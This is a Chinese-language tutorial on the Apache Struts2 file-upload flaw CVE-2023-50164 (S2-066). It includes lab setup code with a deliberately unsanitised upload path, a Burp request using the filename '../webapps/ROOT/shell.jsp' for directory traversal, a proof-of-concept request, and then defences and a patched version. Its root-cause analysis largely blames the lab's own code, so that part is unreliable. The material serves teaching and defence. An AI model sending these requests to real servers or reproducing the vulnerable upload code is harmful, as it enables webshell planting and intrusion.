Apache Struts2 漏洞解析 (CVE-2023-50164\/S2-066) 教学文档<\/h1>

一、漏洞概述<\/h2>
CVE-2023-50164（S2-066）是Apache Struts2框架中的一个高危漏洞，属于文件上传类型漏洞。攻击者可以通过控制上传参数实现目录穿越，如果环境中允许上传危险后缀文件（如jsp文件），攻击者可能结合该漏洞上传webshell至可解析目录，从而执行任意代码。<\/p>

二、影响范围<\/h2>

受影响版本：<\/p>

2.5.0 <= Apache Struts <= 2.5.32<\/li>

6.0.0 <= Apache Struts <= 6.3.0<\/li> <\/ul>

三、环境搭建<\/h2>

1. 准备工作<\/h3>

工具需求：<\/strong><\/p>

IDEA 2021（或其他Java IDE）<\/li>
Apache Maven<\/li>
Tomcat服务器<\/li> <\/ul>
Maven配置步骤：<\/strong><\/p>

下载Apache Maven（推荐3.6.3版本）：https:\/\/archive.apache.org\/dist\/maven\/maven-3\/<\/li>
创建本地仓库文件夹（如maven_repository）<\/li>
修改Maven配置文件（conf\/settings.xml），添加阿里云镜像加速：<\/li> <\/ol>
<mirror><\/span> <\/span><\/span> <id><\/span>alimaven<\/id><\/span> <\/span><\/span> <name><\/span>aliyun maven<\/name><\/span> <\/span><\/span> <url><\/span>http:\/\/maven.aliyun.com\/nexus\/content\/groups\/public\/<\/url><\/span> <\/span><\/span> <mirrorOf><\/span>central<\/mirrorOf><\/span> <\/span><\/span><\/mirror><\/span> <\/span><\/span><\/code><\/pre>2. 创建Maven项目<\/h3> 在IDEA中创建新项目，勾选"从archetype创建"<\/li> 选择org.apache.maven.archetypes:maven-archetype-webapp<\/code><\/li> 配置Maven路径和本地仓库路径<\/li> <\/ol> 3. 添加Struts2依赖<\/h3> 在pom.xml中添加：<\/p> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.struts<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>struts2-core<\/artifactId><\/span> <\/span><\/span> <version><\/span>6.3.0<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>4. 关键代码实现<\/h3> UploadAction.java<\/strong><\/p> package<\/span> com.struts2;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> com.opensymphony.xwork2.ActionSupport;<\/span> <\/span><\/span>import<\/span> org.apache.commons.io.FileUtils;<\/span> <\/span><\/span>import<\/span> java.io.File;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> UploadAction<\/span> extends<\/span> ActionSupport {<\/span> <\/span><\/span> private<\/span> File upload;<\/span> <\/span><\/span> private<\/span> String uploadContentType;<\/span> <\/span><\/span> private<\/span> String uploadFileName;<\/span> <\/span><\/span> <\/span><\/span> \/\/ Getter和Setter方法 <\/span><\/span><\/span><\/span> public<\/span> File getUpload<\/span>()<\/span> {<\/span> return<\/span> upload;<\/span> }<\/span> <\/span><\/span> public<\/span> void<\/span> setUpload<\/span>(<\/span>File upload)<\/span> {<\/span> this<\/span>.<\/span>upload<\/span> =<\/span> upload;<\/span> }<\/span> <\/span><\/span> public<\/span> String getUploadContentType<\/span>()<\/span> {<\/span> return<\/span> uploadContentType;<\/span> }<\/span> <\/span><\/span> public<\/span> void<\/span> setUploadContentType<\/span>(<\/span>String uploadContentType)<\/span> {<\/span> this<\/span>.<\/span>uploadContentType<\/span> =<\/span> uploadContentType;<\/span> }<\/span> <\/span><\/span> public<\/span> String getUploadFileName<\/span>()<\/span> {<\/span> return<\/span> uploadFileName;<\/span> }<\/span> <\/span><\/span> public<\/span> void<\/span> setUploadFileName<\/span>(<\/span>String uploadFileName)<\/span> {<\/span> this<\/span>.<\/span>uploadFileName<\/span> =<\/span> uploadFileName;<\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> String doUpload<\/span>()<\/span> {<\/span> <\/span><\/span> String path =<\/span> "D:\\up\\"<\/span>;<\/span> <\/span><\/span> String realPath =<\/span> path +<\/span> File.<\/span>separator<\/span> +<\/span> uploadFileName;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> FileUtils.<\/span>copyFile<\/span>(<\/span>upload,<\/span> new<\/span> File(<\/span>realPath));<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> SUCCESS;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>struts.xml配置<\/strong><\/p> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE struts PUBLIC "-\/\/Apache Software Foundation\/\/DTD Struts Configuration 2.0\/\/EN" "http:\/\/struts.apache.org\/dtds\/struts-2.0.dtd"><\/span> <\/span><\/span><struts><\/span> <\/span><\/span> <package<\/span> name=<\/span>"upload"<\/span> extends=<\/span>"struts-default"<\/span>><\/span> <\/span><\/span> <action<\/span> name=<\/span>"upload"<\/span> class=<\/span>"com.struts2.UploadAction"<\/span> method=<\/span>"doUpload"<\/span>><\/span> <\/span><\/span> <result<\/span> name=<\/span>"success"<\/span>><\/span>\/index.jsp<\/result><\/span> <\/span><\/span> <\/action><\/span> <\/span><\/span> <\/package><\/span> <\/span><\/span><\/struts><\/span> <\/span><\/span><\/code><\/pre>web.xml配置<\/strong><\/p> <web-app><\/span> <\/span><\/span> <filter><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <filter-class><\/span>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter<\/filter-class><\/span> <\/span><\/span> <\/filter><\/span> <\/span><\/span> <filter-mapping><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <url-pattern><\/span>*.action<\/url-pattern><\/span> <\/span><\/span> <\/filter-mapping><\/span> <\/span><\/span><\/web-app><\/span> <\/span><\/span><\/code><\/pre>index.jsp页面<\/strong><\/p> <html> <body> <h2>文件上传测试<\/h2> <form action="upload.action" method="post" enctype="multipart\/form-data"> <input type="file" name="upload" \/> <input type="submit" value="Upload" \/> <\/form> <\/body> <\/html> <\/code><\/pre> 5. 服务器配置<\/h3> 在IDEA中添加Tomcat服务器配置<\/li> 指定Tomcat安装路径<\/li> 修复配置（Fix）确保项目部署正确<\/li> <\/ol> 四、漏洞探测<\/h2> 通过pom.xml文件确认Struts2版本是否在受影响范围内<\/li> 检查文件上传功能是否存在<\/li> <\/ol> 五、漏洞利用<\/h2> 攻击原理<\/h3> 漏洞利用关键在于控制uploadFileName<\/code>参数实现目录穿越。攻击者可以修改上传文件的文件名，通过包含..\/<\/code>实现路径穿越。<\/p> 攻击示例<\/h3> 修改Burp Suite请求：<\/strong><\/p> POST \/upload.action HTTP\/1.1 Host: target.com Content-Type: multipart\/form-data; boundary=125875361631274606281213046536 --125875361631274606281213046536 Content-Disposition: form-data; name="upload"; filename="..\/webapps\/ROOT\/shell.jsp" Content-Type: text\/plain <% out.println("Hello, World!"); %> --125875361631274606281213046536-- <\/code><\/pre> 官方POC示例<\/h3> POST \/upload.action HTTP\/1.1 Host: localhost:8080 Content-Type: multipart\/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip ------WebKitFormBoundary5WJ61X4PRwyYKlip Content-Disposition: form-data; name="upload"; filename="poc.txt" Content-Type: text\/plain test ------WebKitFormBoundary5WJ61X4PRwyYKlip Content-Disposition: form-data; name="caption"; {{randstr(4097,4097) ------WebKitFormBoundary5WJ61X4PRwyYKlip-- <\/code><\/pre> 六、漏洞分析<\/h2> 漏洞根源<\/h3> 文件上传处理机制<\/strong>：Struts2通过UploadAction<\/code>类处理文件上传，其中upload<\/code>、uploadContentType<\/code>和uploadFileName<\/code>三个属性是关键<\/li> 路径拼接问题<\/strong>：doUpload<\/code>方法中直接拼接上传路径和文件名，未对文件名进行安全校验<\/li> <\/ol> String realPath =<\/span> path +<\/span> File.<\/span>separator<\/span> +<\/span> uploadFileName;<\/span> <\/span><\/span><\/code><\/pre> 目录穿越可能<\/strong>：当uploadFileName<\/code>包含..\/<\/code>时，可实现目录穿越<\/li> <\/ol> 关键代码分析<\/h3> 属性绑定机制<\/strong>：<\/p> upload<\/code>：对应上传的文件内容<\/li> uploadContentType<\/code>：文件类型（自动绑定name属性值+ContentType）<\/li> uploadFileName<\/code>：文件名（自动绑定name属性值+FileName）<\/li> <\/ul> <\/li> 文件保存过程<\/strong>：<\/p> 通过FileUtils.copyFile()<\/code>将上传文件保存到指定路径<\/li> 路径硬编码为"D:\up"，缺乏灵活性<\/li> <\/ul> <\/li> <\/ol> 七、防御措施<\/h2> 升级Struts2版本<\/strong>：升级到不受影响的版本<\/li> 文件名校验<\/strong>：过滤..\/<\/code>等特殊字符<\/li> 使用白名单限制文件扩展名<\/li> <\/ul> <\/li> 安全存储<\/strong>：将上传文件存储在web目录外<\/li> 使用随机生成的文件名<\/li> <\/ul> <\/li> 权限控制<\/strong>：限制上传目录的写入权限<\/li> 禁用上传文件的执行权限<\/li> <\/ul> <\/li> <\/ol> 八、修复建议<\/h2> 官方补丁：应用Apache Struts发布的安全更新<\/li> 自定义修复：修改文件上传逻辑，添加安全校验：<\/li> <\/ol> public<\/span> String doUpload<\/span>()<\/span> {<\/span> <\/span><\/span> String path =<\/span> "D:\\up\\"<\/span>;<\/span> <\/span><\/span> \/\/ 校验文件名 <\/span><\/span><\/span><\/span> if<\/span>(<\/span>uploadFileName.<\/span>contains<\/span>(<\/span>".."<\/span>)<\/span> ||<\/span> uploadFileName.<\/span>contains<\/span>(<\/span>"\/"<\/span>)<\/span> ||<\/span> uploadFileName.<\/span>contains<\/span>(<\/span>"\\"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> ERROR;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 校验文件扩展名 <\/span><\/span><\/span><\/span> if<\/span>(!<\/span>uploadFileName.<\/span>toLowerCase<\/span>().<\/span>endsWith<\/span>(<\/span>".txt"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> ERROR;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> String realPath =<\/span> path +<\/span> File.<\/span>separator<\/span> +<\/span> uploadFileName;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> FileUtils.<\/span>copyFile<\/span>(<\/span>upload,<\/span> new<\/span> File(<\/span>realPath));<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> return<\/span> ERROR;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> SUCCESS;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>九、参考资源<\/h2> 官方漏洞公告：Apache Struts官网安全公告<\/li> 技术分析：https:\/\/trganda.github.io\/notes\/security\/vulnerabilities\/apache-struts\/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)<\/li> CVE详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-50164<\/li> <\/ol>